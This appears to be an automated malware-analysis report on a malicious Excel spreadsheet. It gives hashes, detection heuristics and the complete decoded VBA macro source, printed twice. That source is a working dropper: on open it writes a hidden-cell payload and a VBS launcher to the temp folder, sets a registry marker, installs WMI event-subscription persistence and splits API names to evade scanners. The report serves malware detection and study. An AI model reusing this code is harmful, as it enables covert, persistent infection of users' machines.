Office (OLE) / .XLS malware analysis — malicious · 543746b2c5b65206

MALICIOUS

Office (OLE) / .XLS

252.0 KB Created: 2018-10-31 08:57:54 Authoring application: WPS 表格 First seen: 2026-06-20

MD5: 771b0b1417a5adccaba818ad13b4a269 SHA-1: ce0cf3f7830a64c45c02a0a46eee4f69de07ed38 SHA-256: 543746b2c5b6520637915539b5c717cb461dbb5696375000f1363598dfc93a91

496 Risk Score

Heuristics 12

ClamAV: Xls.Downloader.Generic-6923172-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Generic-6923172-0
VBA macros detected medium 9 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
```

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

  txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
```
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

  Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
  gPath = Environ("TEMP")
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6477 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6477 bytes
SHA-256: `f64b69d8b498ae803886412645e4b45b1ad4b53f8e788c5c8c3f8d40b405812a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() On Error Resume Next Dim gPath As String, str As String gPath = Environ("TEMP") ChDrive "C" ChDir gPath For i = 1 To 180 dmStr = dmStr & Sheets(" ").Range("z" & i).Text Next DMpath = gPath & "\DM6331.TMP" VBSpath = gPath & "\rknrl.vbs" Open DMpath For Output As #1 Print #1, dmStr Close #1 vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)" Open VBSpath For Output As #2 Print #2, vbsStr Close #2 wmiserv dmStr, vbsStr Application.Wait (Now + TimeValue("0:00:01")) Const HKEY_LOCAL_MACHINE = &H80000002 Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue If strValue = "" Then oReg.SetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", "E" & Month(Now()) & "-" & Day(Now()) End If Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34) End Sub Function wmiserv(DM, VBS) On Error Resume Next Dim objConn As Object, nslink As String nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption" Set objConn = GetObject(nslink) DM = Replace(DM, """", """""") VBS = Replace(VBS, """", """""") txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """ txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """ txt = txt & VBS & """:Set objFile = Fso.CreateTextFile(dir&""rknrl.vbs"",True,False):objFile.write VBStxt:objFile.close:WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr""):if wspr = """" then:WShell.regwrite ""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr"", ""E""&Month(now())&""-""&Day(now()), ""REG_SZ"":end if" WmiConsumer objConn, txt, "rknrl" End Function Function WmiConsumer(objConn, txt, consumer) On Error Resume Next dn = "rknrl" runinterval = 1000 stxt = txt Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_ asec.Name = consumer & "_consumer" asec.scriptingengine = "vbscript" asec.ScriptText = stxt Set asecpath = asec.put_ Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_ itimer.timerid = dn & "_itimer" itimer.intervalbetweenevents = runinterval itimer.skipifpassed = False itimer.put_ Set evtflt = objConn.Get("__EventFilter").spawninstance_ evtflt.Name = dn & "_filter" evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer""" evtflt.querylanguage = "wql" Set fltpath = evtflt.put_ Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_ fcbnd.consumer = asecpath.Path fcbnd.Filter = fltpath.Path fcbnd.put_ End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Dim gPath As String, str As String gPath = Environ("TEMP") For i = 1 To 100 str = str & Sheets("test").Range("z" & i).Text Next 'str = "msgbox ""ssfff""" Open gPath & "\DM6331.TMP" For Output As #1 Print #1, str Close #1 Open gPath & "\zz123.vbs" For Output As #2 Print #2, Sheets("test").Range("a1").Text Close #2 Shell "wscript.exe " & """" & gPath & "\zz123.vbs" & """" End Sub Function wmiserv() Dim objConn As Object, nslink As String nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption" Set objConn = GetObject(nslink) txt = "ttttt" WmiConsumer objConn, txt, "rknrl" End Function Function WmiConsumer(objConn, txt, consumer) On Error Resume Next dn = "rknrl" runinterval = 10000 stxt = txt Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_ asec.Name = consumer & "_consumer" asec.scriptingengine = "vbscript" asec.ScriptText = stxt Set asecpath = asec.put_ Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_ itimer.timerid = dn & "_itimer" itimer.intervalbetweenevents = runinterval itimer.skipifpassed = False itimer.put_ Set evtflt = objConn.Get("__EventFilter").spawninstance_ evtflt.Name = dn & "_filter" evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer""" evtflt.querylanguage = "wql" Set fltpath = evtflt.put_ Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_ fcbnd.consumer = asecpath.Path fcbnd.Filter = fltpath.Path fcbnd.put_ End Function

SHA-256: f64b69d8b498ae803886412645e4b45b1ad4b53f8e788c5c8c3f8d40b405812a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
  On Error Resume Next
  Dim gPath As String, str As String
  gPath = Environ("TEMP")
  ChDrive "C"
  ChDir gPath
  For i = 1 To 180
    dmStr = dmStr & Sheets(" ").Range("z" & i).Text
  Next
  
  DMpath = gPath & "\DM6331.TMP"
  VBSpath = gPath & "\rknrl.vbs"
  
  Open DMpath For Output As #1
  Print #1, dmStr
  Close #1
  
  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  
  Open VBSpath For Output As #2
  Print #2, vbsStr
  Close #2
  
  wmiserv dmStr, vbsStr
  Application.Wait (Now + TimeValue("0:00:01"))
  
  Const HKEY_LOCAL_MACHINE = &H80000002
  Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue

  If strValue = "" Then
    oReg.SetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", "E" & Month(Now()) & "-" & Day(Now())
  End If
  

  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
End Sub

Function wmiserv(DM, VBS)
  On Error Resume Next
  Dim objConn As Object, nslink As String
  nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
  Set objConn = GetObject(nslink)
  
  DM = Replace(DM, """", """""")
  VBS = Replace(VBS, """", """""")
  
  txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
  txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """
  txt = txt & VBS & """:Set objFile = Fso.CreateTextFile(dir&""rknrl.vbs"",True,False):objFile.write VBStxt:objFile.close:WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr""):if wspr = """" then:WShell.regwrite ""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr"", ""E""&Month(now())&""-""&Day(now()), ""REG_SZ"":end if"

  WmiConsumer objConn, txt, "rknrl"

End Function

Function WmiConsumer(objConn, txt, consumer)
  On Error Resume Next
  dn = "rknrl"
  runinterval = 1000
  stxt = txt
  Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
  asec.Name = consumer & "_consumer"
  asec.scriptingengine = "vbscript"
  asec.ScriptText = stxt
  Set asecpath = asec.put_
  Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
  itimer.timerid = dn & "_itimer"
  itimer.intervalbetweenevents = runinterval
  itimer.skipifpassed = False
  itimer.put_
  Set evtflt = objConn.Get("__EventFilter").spawninstance_
  evtflt.Name = dn & "_filter"
  evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
  evtflt.querylanguage = "wql"
  Set fltpath = evtflt.put_
  Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
  fcbnd.consumer = asecpath.Path
  fcbnd.Filter = fltpath.Path
  fcbnd.put_
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
  Dim gPath As String, str As String
  gPath = Environ("TEMP")

  For i = 1 To 100
     str = str & Sheets("test").Range("z" & i).Text
  Next
  
  'str = "msgbox ""ssfff"""
  
  Open gPath & "\DM6331.TMP" For Output As #1
  Print #1, str
  Close #1
  
  Open gPath & "\zz123.vbs" For Output As #2
  Print #2, Sheets("test").Range("a1").Text
  Close #2
  
  
  
  Shell "wscript.exe " & """" & gPath & "\zz123.vbs" & """"
  

End Sub
Function wmiserv()
Dim objConn As Object, nslink As String
nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
Set objConn = GetObject(nslink)
txt = "ttttt"
WmiConsumer objConn, txt, "rknrl"
End Function

Function WmiConsumer(objConn, txt, consumer)
On Error Resume Next
dn = "rknrl"
runinterval = 10000
stxt = txt
Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
asec.Name = consumer & "_consumer"
asec.scriptingengine = "vbscript"
asec.ScriptText = stxt
Set asecpath = asec.put_
Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
itimer.timerid = dn & "_itimer"
itimer.intervalbetweenevents = runinterval
itimer.skipifpassed = False
itimer.put_
Set evtflt = objConn.Get("__EventFilter").spawninstance_
evtflt.Name = dn & "_filter"
evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
evtflt.querylanguage = "wql"
Set fltpath = evtflt.put_
Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
fcbnd.consumer = asecpath.Path
fcbnd.Filter = fltpath.Path
fcbnd.put_
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.